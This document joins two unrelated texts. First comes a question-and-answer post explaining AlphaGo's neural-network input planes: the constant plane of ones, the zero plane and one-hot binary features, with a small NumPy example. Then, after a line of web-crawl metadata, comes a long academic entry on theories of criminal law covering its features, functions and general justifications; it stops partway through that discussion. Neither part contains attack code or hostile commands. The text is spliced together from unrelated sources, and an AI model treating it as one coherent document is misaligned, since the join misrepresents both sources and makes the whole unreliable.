If it's possible for all input features to also have values of $0$, it may in some situations be difficult or impossible for the neural network to distinguish the "real" $0$ inputs from the $0$ entries in the padding around the board, i.e. it may struggle to know where the game board is and where the game board ends. Having a constant input plane that's always filled with $1$s can help in this respect, because that plane can always reliably be used to distinguish "real" cells that actually exist on the game board from positions that are just outside the game board.
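The ambiguity described above is easy to demonstrate concretely. This sketch uses plain NumPy rather than any particular deep-learning framework: a zero-padded feature plane makes an empty on-board cell indistinguishable from the padding outside the board, while a constant plane of ones keeps the board's extent visible:

```python
import numpy as np

board = np.zeros((5, 5))      # one small feature plane: an empty "board", all 0s
ones_plane = np.ones((5, 5))  # constant plane marking where the board actually is

# Zero-pad both planes by one cell, as a 3x3 convolution conceptually does.
padded_board = np.pad(board, 1)
padded_ones = np.pad(ones_plane, 1)

# In the board plane alone, a real corner cell and a padding cell look identical:
print(padded_board[1, 1], padded_board[0, 0])  # 0.0 0.0 -> indistinguishable
# The constant ones plane disambiguates on-board cells from padding:
print(padded_ones[1, 1], padded_ones[0, 0])    # 1.0 0.0 -> on-board vs padding
```

A filter that includes the ones plane among its input channels can therefore "see" where the board ends, even when every other input channel is zero there.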
As for the plane filled with $0$s... I have no idea why that would ever be useful. Maybe it was useful due to some peculiar implementation detail. In this thread, some people hypothesise that on specific hardware it might make some computations slightly more efficient because of the layout of the data in memory -- it causes the number of channels to be divisible by $8$, which will... maybe help? I really don't know too much about this, but I do know that on a smaller scale, sometimes adding unused data in classes can indeed increase performance due to better layout in memory. I suppose it's also possible that it was added by mistake, or "just in case", and that it doesn't really have much of a purpose. The amount of hardware that the AlphaGo team had available to them is quite insane anyway, one channel more or less probably wasn't too big of a concern for them.
What's more, I don't understand the sharp sign here. Does it mean "the number"? But one number is enough to represent "the number of turns since a move was played", why eight?
This is explained in the "Features for policy/value network" paragraph in the paper. Quote from the paper:
"Each integer feature value is split into multiple $19 \times 19$ planes of binary values (one-hot encoding). For example, separate binary feature planes are used to represent whether an intersection has $1$ liberty, $2$ liberties, $\dots$, $\geq 8$ liberties."
All feature planes used were strictly binary, no feature planes were used that had integer values $> 1$. This is quite common when possible, because neural networks tend to have a much easier time learning with binary features than with integer- or real-valued features. | <urn:uuid:82e5e96f-b242-4f53-8220-a9ec3c044aae> | CC-MAIN-2023-14 | https://ai.stackexchange.com/questions/11014/why-is-a-constant-plane-of-ones-added-into-the-input-features-of-alphago | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296950422.77/warc/CC-MAIN-20230402074255-20230402104255-00608.warc.gz | en | 0.963812 | 641 | 2.734375 | 3 |
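The one-hot splitting described in the quoted passage can be sketched as follows. This is an illustrative reconstruction, not code from the paper; the function name, the toy board shape, and the cap of 8 (mirroring the liberties example) are assumptions:

```python
import numpy as np

def to_binary_planes(int_plane, max_value=8):
    """Split an integer-valued H x W feature plane into max_value binary planes.
    Plane k (0-indexed) is 1 where the value equals k + 1; clipping first means
    the last plane also covers values >= max_value, like the ">= 8 liberties" plane."""
    clipped = np.minimum(int_plane, max_value)
    return np.stack([(clipped == k + 1).astype(np.float32)
                     for k in range(max_value)])

liberties = np.array([[0, 1, 2],
                      [3, 8, 12]])  # toy 2x3 "board" of liberty counts
planes = to_binary_planes(liberties)
print(planes.shape)  # (8, 2, 3): one binary plane per count 1..8
# planes[0] is 1 only where there is exactly 1 liberty;
# planes[7] is 1 where there are 8 or more liberties (both the 8 and the 12).
```

Note that a count of 0 simply produces a 0 in every plane, so all planes stay strictly binary, as the answer describes.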
Theories of Criminal Law
Any theory of criminal law must explain why criminal law is distinctive—why it is a body of law worthy of separate attention. This entry begins by identifying features of criminal law that make this so (§1). It then asks what functions that body of law fulfills (§2), and what justifies its creation and continued existence (§3). If criminal law should be retained, we must consider its proper limits (§4). We must consider the conditions under which agents should be criminally responsible for whatever falls within those limits (§5). And we must ask which rules of procedure and evidence should govern efforts to establish criminal responsibility (§6). The focus of this entry is Anglo-American criminal law and scholarship thereon. Many of the questions raised, and many of the answers considered, are nonetheless of general application.
- 1. Features of Criminal Law
- 2. Functions of Criminal Law
- 3. Justifications of Criminal Law
- 4. The Limits of Criminal Law
- 5. Criminal Responsibility
- 6. Criminal Procedure and Evidence
- Academic Tools
- Other Internet Resources
- Related Entries
1. Features of Criminal Law
The life of the criminal law begins with criminalization. To criminalize an act-type—call it \(\phi\)ing—is to make it a crime to commit tokens of that type. Many claim that if it is a crime to \(\phi\) then \(\phi\)ing is legally wrongful—it is something that, in the eyes of the law, ought not to be done (Hart 1994, 27; Gardner 2007, 239; Tadros 2016, 91). On this view, we are not invited to commit crimes—like murder, or driving uninsured—just as long as we willingly take the prescribed legal consequences. As far as the law is concerned, criminal conduct is to be avoided. This is so whether or not we are willing to take the consequences.
It is possible to imagine a world in which the law gets its way—in which people uniformly refrain from criminal conduct. Obviously enough this is not the world in which we live. Imagine \(D\) is about to \(\phi\). If \(\phi\)ing is a crime, reasonable force may permissibly be used to prevent \(D\) \(\phi\)ing. Police officers and private persons alike have powers to arrest \(D\), and reasonable force may permissibly be used to make arrests effective.
These powers and permissions exist ex ante—prior, that is, to the commission of crime. We can add those that exist ex post—once crime has been committed. Imagine now that \(D\) has \(\phi\)ed. As well as the power to arrest \(D\), the criminal law confers a set of investigative powers designed to help generate evidence of \(D\)’s criminality: these include powers to stop and search, to carry out surveillance, and to detain suspects for questioning. If sufficient evidence is produced, and it is in the public interest to do so, \(D\) may be charged with a crime. To exercise these powers is to impose new duties on \(D\)—\(D\) must submit to the search, remain in detention, and turn up in court when required. For \(D\) to do otherwise—absent justification or excuse—is itself criminal. So reasonable force can permissibly be used against \(D\) if she refuses to co-operate.
The powers and permissions mentioned so far help \(D\)’s accusers put together their case against \(D\). By the time cases reach the courts those accusers are typically state officials (or those to whom the state has delegated official power). Some legal systems do make space for private prosecutions. But such prosecutions can be discontinued or taken over by state officials (and their delegates). Those officials (and delegates) can also continue proceedings in the face of private opposition, even when the opposition comes from those wronged by \(D\). In this way, the state exercises a form of control over criminal proceedings that is absent from legal proceedings of other kinds (Marshall and Duff 1998).
It may seem from the above that criminal proceedings are tilted heavily in favour of the accusing side. But the criminal law also confers rights on the accused that help protect \(D\) against her accusers (Ashworth and Zedner 2010, 82). These typically include the right to be informed of the accusations in question, the right to confidential access to a lawyer, and the privilege against self-incrimination. Most important of all, perhaps, is the right to be tried before an independent court that respects the presumption of innocence—that requires the prosecution to prove beyond a reasonable doubt that \(D\) committed the crime.
At least on paper, the procedural protections on offer in criminal proceedings are more robust than those available to the accused in legal proceedings of other kinds. This is explained in large part by the consequences of criminal conviction. If \(D\) is found guilty in a criminal court, \(D\) gains a criminal record. Depending on the crime, \(D\) may be disenfranchised, banned from certain professions, refused entry to other countries, and declined access to insurance, housing, and education (Hoskins 2014; 2016). This is to say nothing of criminal sentences themselves. Those sentences are typically punishments: the object of the exercise is that \(D\) suffer some harm or deprivation; \(D\) is to be made worse off than she otherwise would have been. This is not to say that suffering or deprivation must be the ultimate end of those who punish. That \(D\) suffer or lose out may be a means to any number of ultimate ends, including deterrence, restoration, or rehabilitation. What it cannot be is a mere side-effect. This is one thing that distinguishes criminal sentences—at least of the punitive kind—from the reparative remedies that are standard fare in civil law. Those remedies are designed to benefit \(P\)—to wipe out losses the plaintiff suffered in virtue of the defendant’s wrong. True, \(D\) often loses in the process of ensuring that \(P\) gains. But we can imagine cases in which this is not so: in which an award of damages leaves \(D\) no worse off than \(D\) was before. The award may remain a reparative success. It cannot be anything other than a punitive failure (Boonin 2008, 12–17; Gardner 2013).
We can now see that criminalizing \(\phi\)ing does much more than make \(\phi\)ing a legal wrong. It also makes it the case that \(\phi\)ing triggers a set of legal rights, duties, powers, and permissions, the existence of which distinguishes criminal law from the rest of the legal system. Those rights, duties, powers, and permissions are constitutive of a criminal process via which suspected \(\phi\)ing turns into arrest, charge, trial, conviction, and punishment. Obviously suspicions are sometimes misplaced. Innocent people’s lives are sometimes ruined in consequence. So it is no surprise that the most destructive powers and permissions are jealously guarded by the criminal law. Trials held in a university’s moot court might be meticulously fair to defendants. But a moot court has no power to detain us in advance, to require us to appear before it, or to sentence us to imprisonment. Force used to achieve any of these things would itself be criminal, however proportionate the resulting punishment might be. As this example shows, criminal law is characterised by an asymmetry—it bestows powers and permissions on state officials (and delegates) which are withheld from private persons, such that the latter are condemned as vigilantes for doing what the former lawfully do (Thorburn 2011a, 92–93; Edwards forthcoming). This remains the case—often to the great frustration of victims and their supporters—even if the official response, assuming it comes at all, will be woefully inadequate.
2. Functions of Criminal Law
Few deny that one function of criminal law is to deliver justified punishment. Some go further and claim that this is the sole function of criminal law (Moore 1997, 28–29). Call this the punitive view. Rules of criminal procedure and evidence, on this view, help facilitate the imposition of justified punishment, while keeping the risk of unjustified punishment within acceptable bounds. Rules of substantive criminal law help give potential offenders fair warning that they may be punished. Both sets of rules combat objections we might otherwise make to laws that authorize the intentional imposition of harm. To combat objections, of course, is not itself to make a positive case for such laws. That case, on the punitive view, is made by the justified punishments that criminal courts impose. This is not to say anything about what the justification of punishment is. It is merely to say that criminal law is to be justified in punitive terms.
Some object that this focus on punishment is misplaced. The central function criminal law fulfills in responding to crime, some say, is that of calling suspected offenders to account in criminal courts (Gardner 2007, 80; Duff 2010c, 16). This view puts the criminal trial at the centre, not just of criminal proceedings, but of criminal law as a whole (Duff 2013a, 196). Trials invite defendants to account for themselves either by denying the accusation that they offended, or by pleading a defence. The prospect of conviction and punishment puts defendants under pressure to offer an adequate account. Call this the curial view. It differs from the punitive view in two ways. First, part of the positive case for criminal law is independent of the imposition of punishment. Second, part of the positive case for imposing criminal punishment is dependent on the punishment being part of a process of calling to account. The following two paragraphs expand on both these claims.
As to the first, we often have reason to account for our actions to others. We can leave open for now the precise conditions under which this is so. But it is plausible to think that if Alisha steals from Bintu she has reason to account for the theft, and that if Chika intentionally kills Dawn she has reason to account for the killing. Defenders of the curial view argue that criminal proceedings are of intrinsic value when defendants (are called to) offer accounts of themselves that they have reason to offer in criminal courts (Gardner 2007, 190–191; Duff 2010c, 15–17). Imagine Alisha stole from Bintu because she was under duress. Imagine Chika intentionally killed Dawn to defend herself or others. Neither of these defendants, we can assume, is justifiably punished. On the punitive view, criminal law’s function does not stand to be fulfilled. On the curial view, things are different. Alisha and Chika both have reason to account for their behaviour—to explain what they did and why they did it. Criminal proceedings invite each to provide that account and put each under pressure to do so. Assuming Alisha and Chika have reason to account in a criminal court, proceedings in which they (are called to) do so are of intrinsic value. One of criminal law’s functions is fulfilled even if no-one is, or should be, punished.
To endorse the curial view is not, of course, to say that we should do away with criminal punishment. But it is to say that the connection between trial and punishment is not merely instrumental. Some think that the facts that make punishment fitting—say, culpable wrongdoing—obtain independently of criminal proceedings themselves (Moore 1997, 33). We use those proceedings to ensure that said facts are highly likely to have obtained—that \(D\) is highly likely to have culpably committed a wrong. On the curial view, the fact that \(D\) has been tried and found guilty (or has entered a guilty plea) is itself part of what makes it fitting that \(D\) is punished. The fitting way to respond to criminal wrongdoing, on this view, is to call the wrongdoer to account for her wrong. To call \(D\) to account is to attempt to both (a) get \(D\) to answer for wrongdoing (as occurs in court), and (b) get \(D\) to confront wrongdoing for which she has no satisfactory answer (as occurs when \(D\) is punished). So it is only because \(D\) has first been tried and found guilty (or has entered a guilty plea) that punishment counts as a fitting response to \(D\)’s wrong (Gardner 2007, 80; Duff 2013a, 205). We can see the implications of this view by imagining a world in which trials are abolished, because some new-fangled machine allows us to identify culpable wrongdoers with perfect accuracy. Having no doubt that \(D\) is guilty, we simply impose punishment on \(D\). On the curial view, the punishments we impose are inherently defective: they are not imposed as part of a process of calling to account. Though our new-fangled machine might justify doing away with trials—once we factor in how expensive they can be—we would lose something of value in doing away with them.
If criminal law does have a particular function, we can ask whether that function is distinctive of criminal law. We can ask, in other words, whether it helps distinguish criminal law from the rest of the legal system. It has been claimed that criminal law is distinctive in imposing punishment (Moore 1997, 18–30; Husak 2008, 72). One might also claim that criminal law alone calls defendants to account. But punishments are imposed in civil proceedings—exemplary damages are the obvious case. And it is arguable that civil proceedings also call defendants to account—that they too invite defendants to offer a denial or plead a defence; that they too use the prospect of legal liability to put defendants under pressure to account adequately (Duff 2014a).
In response, one might try to refine the function that is distinctive of criminal law. Perhaps criminal law’s function is to respond to public wrongs (whether by calling to account or punishing such wrongdoers), whereas the function of civil law is to respond to private wrongs. What we should make of this proposal depends on what a public wrong is (Lamond 2007; Lee 2015; Edwards and Simester 2017). To make progress, we can distinguish between primary duties—like duties not to rape or rob—and secondary duties—like duties to answer, or suffer punishment, for rape or robbery. We incur duties of the latter kind by breaching duties of the former.
If the public/private distinction is cashed out in terms of primary duties, then responding to public wrongs cannot be distinctive of criminal law. Many wrongs are both crimes and torts. So the two bodies of law often respond to breaches of the same primary duty. A more promising proposal looks to secondary duties. Perhaps criminal law’s distinctive function is to respond to wrongs on behalf of us all—to discharge secondary duties owed to the community as a whole (Duff 2011, 140). Perhaps the function of civil law is to respond to wrongs on behalf of some of us—to discharge secondary duties owed to particular individuals. This might be thought to explain why criminal proceedings, unlike civil proceedings, are controlled by state officials: why officials can initiate proceedings that individual victims oppose, and discontinue proceedings that victims initiate.
The view described in the previous paragraph conceives of criminal law as an instrument of the community—a way of ensuring that the community gets what it is owed from wrongdoers. Call it the communitarian view. If we combine this with the curial view, the distinctive function of criminal law is to seek answers owed to the community as a whole. One might doubt that the functions of criminal and civil law can be so neatly distinguished. It is arguable that civil law sometimes responds to wrongs on behalf of all of us—civil proceedings can be brought against \(D\) on the basis that her conduct is a nuisance to the public at large, or on the basis that \(D\) is a public official whose conduct is an abuse of power. More importantly, one might claim that in the case of paradigmatic crimes—like robbery, rape, or battery—criminal law responds to wrongs on behalf of particular individuals—on behalf of those who have been robbed, raped, or battered. On this view, a positive case for criminalization need not await the finding that \(D\) owes something to the whole community. It is at least sometimes enough that \(D\) owes something to those \(D\) has wronged, which \(D\) would fail to provide in the absence of criminal proceedings.
Those who reject the communitarian view might be thought to face the following difficulty: they might be thought to lack an explanation of official control over how far criminal proceedings go. If criminal law seeks what is owed by wrongdoers to the wronged, doesn’t official control amount to theft of a conflict properly controlled by the two parties (Christie 1977)? Not necessarily. First, we should not always require the wronged to have to pursue those who have wronged them. Second, we should not always support those who think themselves wronged in pursuing alleged wrongdoers. As to the first point, some are trapped in abusive relationships with those who wrong them. Others are susceptible to manipulation that serves to silence their complaints. Some wrongdoers can use wealth and social status to stop accusers in their tracks. As to the second point, the temptation to retaliate in the face of wrongdoing is often great. It is all too easy for the pursuit of justice to become the pursuit of revenge, and for the perceived urgency of the pursuit to generate false accusations. Official control can help vulnerable individuals—like those described above—to get what they are owed. And it can mitigate the damage done by those trying to exact vengeance and settle scores (Gardner 2007, 214–216). It can ensure that those in positions of power cannot wrong others with impunity, and reduce the likelihood that vindictiveness begets retaliation, which begets violent conflict from which all lose out (Wellman 2005, 8–10). We can add that criminal proceedings may help protect others against being wronged in future. Those wronged may have a duty to give up control of proceedings in order to provide this protection (Tadros 2011c, 297–299).
These remarks suggest an alternative to the communitarian view. According to the alternative, the secondary duties of concern in civil and criminal proceedings are typically one and the same. The positive case for criminal law’s involvement is not that it discharges duties of interest to the criminal law alone, but that it enables duties of general interest to be discharged less imperfectly than they otherwise would be—than they would be if the criminal law took no interest in them. Call this the imperfectionist view. What is distinctive of criminal law, on this view, is not its function but its mode of functioning: the manner in which it fulfills functions shared with other bodies of law.
Some writers seek criminal law’s distinctiveness in a different place. What is distinctive about criminal law, they claim, is that it publicly censures or condemns. This expressive function is sometimes associated with criminal punishment (Husak 2008, 92–95). Because other bodies of law sometimes punish, and because punishment typically—perhaps necessarily—expresses censure (Feinberg 1970), the expressive function is at least partly shared. But the message sent by criminal law is not sent only at the sentencing stage. It is sent the moment a guilty verdict is reached by a criminal court—by the declaration that \(D\) has been criminally convicted (Simester 2005, 33–36). The social significance of conviction is very different to that of (say) the verdict that \(D\) is a tortfeasor: the former verdict conveys, in and of itself, that \(D\)’s conduct reflects badly on \(D\). Though additional detail may generate the same conclusion in the case of a civil verdict, such detail is not required in the case of criminal conviction. If this is right, the distinctiveness of criminal law turns out not to consist in the fact that it provides for punishment. It turns out to consist (at least in part) in the provision of a technique for condemning wrongdoers which does not require that we punish in order to condemn.
So far, we have focused on the functions criminal law fulfills in response to the commission of crime. It is plausible to think, however, that criminal law’s functions include preventing crime from occurring. We can see this by asking what success would look like for the criminal law. Would criminal law have succeeded if all thieves and murderers were tried and punished? Or would it have succeeded if there was no theft or murder, because criminalization resulted in would-be thieves and murderers refraining from such wrongs? Notice that to pose these two questions as alternatives is not to deny that punishment might be justified in preventive terms. It is rather to suggest that resorting to punishment to achieve prevention is already a partial failure for the criminal law. It is a failure to deter those who, ex hypothesi, have already committed criminal offences. Had the creation of those offences been an unqualified success, there would have been nothing for which to punish anyone.
One might hold that criminal law’s sole function is to prevent criminal wrongdoing. Call this the preventive view. Defenders of this view need not say that we should enact whatever laws will achieve the most prevention. That \(X\) is the function of \(Y\) does not entail that we are justified in doing whatever will achieve most of \(X\) with \(Y\). That cutting is the function of knives does not entail that knife-holders are justified in cutting whatever they see. Holders of the preventive view can, in other words, accept the existence of constraints on prevention, that are not themselves justified in preventive terms (Hart 1968, 35–50). What they cannot accept is a positive case for criminal law that is not preventive.
Some hold a mixed view that combines elements of those considered above (Alexander and Ferzan 2009, 3–19; Simester and von Hirsch 2011, 3–18; Tadros 2016, 159–172). One way to construct such a view is by distinguishing between primary and secondary functions. Primary functions are those that, when all else is equal, we have most reason to want the law to fulfil. Secondary functions are those we have reason to want the law to fulfil if it fails to fulfil its primary functions. Criminal law’s primary functions, it is plausible to think, are preventive. Ceteris paribus, we have most reason to want criminal law to bring about a world in which wrongs like theft or murder do not occur. Failing that, we have reason to want criminal law to call thieves and murderers to account, and to punish those who have no adequate account to offer.
There is some scepticism about mixed views. For some, the worries are conceptual. Moore claims that justified punishment must be imposed for reasons of desert, and that for this reason the punitive and preventive functions cannot be combined. We are unable to ‘kill two birds with the proverbial one stone, for by aiming at one of the birds we will necessarily miss the other’ (Moore 1997, 28). Several replies are available. First, even if this is a problem for a mixed view of punishment, it need not be for a mixed view of criminal law. Grant that punishment must be imposed for reasons of desert. It does not follow that criminal offences cannot be created for reasons of prevention. Criminalization and punishment are different acts, and can be performed for different reasons (Edwards and Simester 2014). Second, to claim that \(X\) is part of the positive case for criminal law—that it is one of criminal law’s functions—is not to claim that \(X\) should be part of the mission of every criminal justice official (Gardner 2007, 202). Reasons that help make a positive case for our actions are often reasons for which we should not act. That one will be financially secure is a reason to get married, but one should not get married in order to be financially secure. Similarly, to say that prevention helps make a positive case for criminal law—and for punishment—is not to say that judges should punish for that reason.
Other worries about mixed views are pragmatic (Duff 2010a). As criminal wrongdoing will persist whatever we do, the preventive function sets criminal law an insatiable goal. There is a standing risk that law-makers who pursue that goal will deprive us of a criminal law that fulfils its other functions. Consider again the curial view. Plausibly, we have reason to account for wrongs like theft and fraud in criminal court, but no reason to account for every interaction with property or all misleading statements from which we stand to gain. If defendants are to be called to account for the wrongs, it is these that must be criminalized. To criminalize trivialities—in pursuit of preventive ends—is to drain criminal proceedings of their intrinsic value (Duff 2010b). No doubt these are important worries. But they do nothing to suggest that we should reject a mixed view. At most, they show that law-makers also should not take prevention to be part of their mission. As we already saw, this conclusion does not show that prevention is not part of the positive case for criminal law. And it may anyway be too strong. Law-makers who exclude prevention from their mission may refuse to create crimes that would prevent a great deal of harm. The cost of refusing to create these crimes might be greater than the cost of calling people to account for trivialities, and this might be so even when alternative means of prevention are factored in. If so, criminal law’s preventive function should be part of the law-making mission: it is a function law-makers should indeed aim to fulfil.
3. Justifications of Criminal Law
In light of the resources it consumes, and the damage it does to people’s lives, it is far from clear that we are justified in having criminal law. If we should not be abolitionists, criminal law must be capable of realizing some value that gives us sufficient reason to retain it. To offer an account of this value is to offer a general justification of criminal law. Obviously enough, the functions of criminal law tell us something about what this might be. If the punitive view is correct, criminal law’s value consists in delivering justified punishment. If the curial view is correct, that value consists (in part) in people offering answers that they have reason to offer. If the preventive view is correct, it consists in preventing criminal wrongs. So stated, however, these views do not tell us what the value of fulfilling each function actually is. The punitive view tells us nothing about what justifies criminal punishment. The curial view tells us nothing about the value of calling people to account in criminal courts. The preventive view tells us nothing about the value of preventing crime. A general justification of criminal law fills this explanatory gap.
We can make progress by distinguishing between value of different kinds. Some value is relational—it exists in virtue of relationships in which people stand. That a relationship has such value is a reason to do what will bring it into existence. The value of friendship is a reason to make friends. The value of egalitarian social relations is a reason to break down barriers of status and rank. Some argue that we have sufficient reason to have criminal law because it helps us enter a valuable relationship: it helps transform our relations with one another from relations of mutual dependence, to relations of independence from the power of others (Ripstein 2009, 300–324; Thorburn 2011a, 2011b).
This argument can be developed as follows. Just as slaves are dependent on their masters, so we are dependent on one another in the absence of a framework of legal rights: just as masters wrong their slaves, however well they treat them, so we are doomed to wrong one another if no such framework exists. To avoid this, we need more than just rights that exist on paper. We need sufficient assurance that our rights will be respected, and we need a mechanism by which their supremacy can be reasserted in the face of wilful violation. Criminal law’s value lies in giving us what we need. Criminal punishment amounts to reassertion. Crime prevention provides reassurance. At the level of function, this is what the last section called a mixed view. But the value of fulfilling both functions is one and the same: it is the value of securing our independence from one another, so we cease to relate to one another as master and slave, and begin to do so as independent beings. As it is often associated (rightly or wrongly) with Kant’s political philosophy, we can call this the Kantian view.
It is sometimes suggested that criminal law’s general justification is exhausted by its contribution to our independence. It is not clear why we should accept this claim. One source of doubt is the fact that some agents are unavoidably dependent—they lack the capacities required to live as independent beings. This is true of some non-human animals, and some of those with serious disabilities. Precisely because of the capacities they lack, these agents are especially vulnerable to being abused or exploited. Part of criminal law’s general justification is that it protects the vulnerable against such wrongs. Ex hypothesi, this does nothing to secure independence. So it is not something that can be accommodated by (the exhaustive form of) the Kantian view (Tadros 2011b).
For defenders of the Kantian view, criminal law’s value derives from a relationship it helps create. On another view, the value of criminal law derives from a relationship that pre-exists it: the relationship in which we stand as members of a political community (Duff 2011). Any such community has values in terms of which it is understood by its members. If this self-understanding is to be more than a charade, the community must actually value its defining values—it must do what those values are reasons to do. Imagine that life is one such value, and a member takes another’s life. Part of what it is for a community to value life is for it to respond to the taking: for the killer to be required to account to fellow members, thereby communicating the community’s judgment that the killing was wrong. Criminal law is a body of law that requires the accounting. Functionally, this is a version of the curial view. But the value of fulfilling that function is relational: it is the value of making the community one that is true to itself—one that does not betray the values in terms of which members understand what it is and who they are (Duff and Marshall 2010, 83–84). This line of thought lends support to what I earlier called the communitarian view. On that view, criminal proceedings discharge secondary duties owed to the community as a whole. That such duties are part and parcel of a valuable form of relationship helps explain why we should think that they exist.
One objection to the view described in the previous paragraph is that it is unduly conservative. What justifies criminalizing a wrong—on that view—is that the wrong has a pre-existing foothold in the defining values of the community: it is because of that foothold that failing to criminalize would be a form of self-betrayal. Some communities, however, are characterised by systematic neglect of important values—by patriarchy, or racism, or distributive inequality. When this is so, part of the justification for criminalization is not that it helps the community remain true to itself, but that it helps transform the community by reconstituting it in valuable ways (Dempsey 2009; 2011). One source of criminal law’s value, on this alternative view, is its ability to help alter social morality, such that neglected values come to be taken seriously by community members (Green 2013a). Where this is successful, criminal law can largely disappear from members’ motivational horizons: we come to refrain from conduct for the moral reasons that make it wrong, without reference to the fact that the conduct is criminal.
Both versions of the relational view—Kantian and communitarian—face another doubt. Imagine \(D\) robs \(V\). It is plausible to think that this wrong is of concern to the criminal law in its own right. It is plausible to think that whatever further effects it might have, preventing the wrong of robbery itself helps justify criminalizing robbery, and bringing criminal proceedings against robbers. On both the Kantian and communitarian views this is not the case. What justifies criminalizing wrongs, and bringing criminal proceedings against wrongdoers, is that this contributes to some larger social good—to the framework of legal rules we need for independence, or to the community remaining true to itself. We may reasonably doubt that wrongs like robbery and murder matter to the criminal law only for these further reasons. In claiming that this is why they matter, both versions of the relational view instrumentalize criminal law’s concern with wrongdoing: both hold that we have reason to prevent wrongs via the criminal law only because this is a means of establishing healthy relations in which all share.
The above remarks concern the kind of value that justifies having criminal law. We can also ask who is capable of realizing that value. On both the views sketched above, criminal law’s value is grounded in a relationship in which all stand. If that value is to be realised, someone must act on behalf of those who stand in the relationship. In most systems of criminal law, the job is done by the state—agents of the state create, apply, and enforce criminal laws. Some argue that in a legitimate system of criminal law this is the only possibility. Criminal law’s value, it is claimed, is essentially public—it is value that can only be realised, even in principle, by agents of the state. This view can be developed in a number of ways. Consider again the Kantian view. Some claim that coercion secures independence only if the coercer speaks for all those coerced. Otherwise it is just another independence violation. Only state agents can speak for all of us. So the enforcement of the criminal law must remain in their hands (Thorburn 2011a, 98–99). Defenders of the communitarian view tell a similar story. If the value of criminal proceedings is that they express the community’s judgment about wrongdoing, and if only state agents can convey our collective judgment, trials must be carried out, and punishments imposed, by those agents (Duff 2013a, 206). On both views, it is impossible for private persons to realise the values that justify criminal law. If these arguments go through, they have obvious implications for debates about the privatization of prison and police services (Dorfman and Harel 2016). They also offer us a sense in which criminal law theory must be political. It must face up to the question of whether there are essentially public goods, and ask what role they play in justifying the existence of criminal law (Harel 2014, 96–99).
Some find criminal law’s general justification in value that is neither relational nor essentially public. Consider the prevention of harm, or the prevention of moral wrongdoing. A number of writers appeal to one or both values to justify the existence of criminal law (Feinberg 1987, 146–155; Alexander and Ferzan 2009, 17; Simester and von Hirsch 2011, 29–30). Because there are wrongless harms (think of sporting injuries caused without foul play) and harmless wrongs (think of botched conspiracies or undiscovered attempts) the aforementioned values do not always wax and wane together. One possibility is that criminal law’s concern with wrongs is derivative of its concern with harms: criminal law should prevent wrongs (e.g., conspiracy to injure) when and because harm is thereby prevented (e.g., injury itself). Another possibility is that criminal law’s concern with harms is derivative of its concern with wrongs: criminal law should prevent harms (e.g., physical injury) when and because those harms are wrongfully caused (e.g., by assault) (Feinberg 1987, 151–155; Moore 1997, 647–649). A third possibility is that harms and wrongs provide two independent sources of general justification (compare Tadros 2016, 162–166). Whatever the answer, this preventive value is impersonal in two ways: it is not grounded in any special relationship; and it is value that might in principle be realised by any of us.
Anyone who seeks criminal law’s justification in the coin of impersonal value must also account for what the criminal law does when prevention fails. Imagine \(D\) assaults \(V\), thereby causing \(V\) physical injury. Some claim that \(D\) thereby incurs secondary moral duties, not in virtue of any relationship in which \(D\) stands, but simply in virtue of facts about the wrong \(D\) committed (Moore 1997, 170–172; Tadros 2011c, 275–283). Criminal law’s responses to crime discharge these duties, it is claimed, and this is what justifies those responses.
It is worth distinguishing between two versions of this view. According to Moore, all culpable wrongdoers incur a duty to allow themselves to suffer. Retributive justice is done when punishment imposes that suffering, and this is what justifies the imposition of criminal punishment (Moore 1997, 70–71). Moore argues that the suffering of culpable wrongdoers is intrinsically good. On a rival view, suffering is always intrinsically bad. We must accept, however, that in some cases not all suffering can be avoided. Sometimes we must choose between wrongdoers suffering now and others suffering at the hands of wrongdoers later. Only by imposing the former can we protect against the latter. It might look as though punishing wrongdoers for these protective reasons amounts to treating them as mere means. But this is not necessarily so. Tadros argues that some wrongdoers incur duties to protect others at the cost of some harm to themselves. We can justify imposing punishments that come at this cost to these wrongdoers, when the punishments protect others by preventing future wrongs. As those punished are only doing their duty, we can reasonably claim that they are not treated as mere means (Tadros 2011c; 2016). Though Moore and Tadros disagree on many things, their views also have something in common. Both claim that, as a matter of principle, anyone might impose punishment that discharges wrongdoers’ secondary duties. The value to which both appeal to justify punishment is impersonal: it is neither relational nor essentially public (Moore 2009a, 42; Tadros 2011c, 293).
General justifications of criminal law like those sketched in the last few paragraphs face a number of criticisms. One objection has it that they are unduly expansive: much moral wrongdoing—even much that generates secondary duties to suffer or protect—is no business of the criminal law. Failing to help one’s friend move house because one is lazy is a culpable wrong. But as the failure is a private matter—to be resolved by the friends themselves—there is no reason for law-makers to criminalize the wrong (Duff 2014b; Husak 2014, 215–216). There is certainly no reason for them to criminalize it when the friends are both citizens of another state, and the failure occurs in the other jurisdiction (Duff 2016). Reasons to criminalize exist, as it is often put, only where law-makers have standing. And the mere fact that a wrong generates the aforementioned secondary duties does not itself give law-makers standing to criminalize it.
According to a second objection, the focus on moral wrongdoing is unduly restrictive: much that is not morally wrong—and which generates no secondary duties—is the business of the criminal law. According to one argument for this conclusion, the stable existence of (almost) any valuable social institution—be it financial, educational, familial, military, or political—depends on widespread compliance with its rules. Under realistic conditions, criminal liability for violation is necessary for stability. It is the value of stable institutions, not the moral wrongfulness of violating their rules, that justifies bringing criminal law into existence (Chiao 2016).
A third objection returns us to the asymmetry discussed at the end of section 1. Many of the powers and permissions by means of which criminal justice is done are withheld from private persons. Most obviously, private persons are not typically permitted to use force to punish others for crime. Few think that this should be changed. Vigilantism should remain criminal. If the values that justify having criminal law are essentially public, we appear to have an easy explanation of this fact: private persons cannot, even in principle, realise the values that justify criminal punishment; so they should not be permitted to punish. If those values are not essentially public, things are more difficult. There will surely be cases in which private persons are best placed to discharge \(D\)’s secondary duties—in which the state will not punish \(D\), but our imagined moot court would fine \(D\) a proportionate amount. It is not immediately clear that those who find criminal law’s general justification in impersonal values can explain why the moot court may not extract the money (Thorburn 2011a, 92–93).
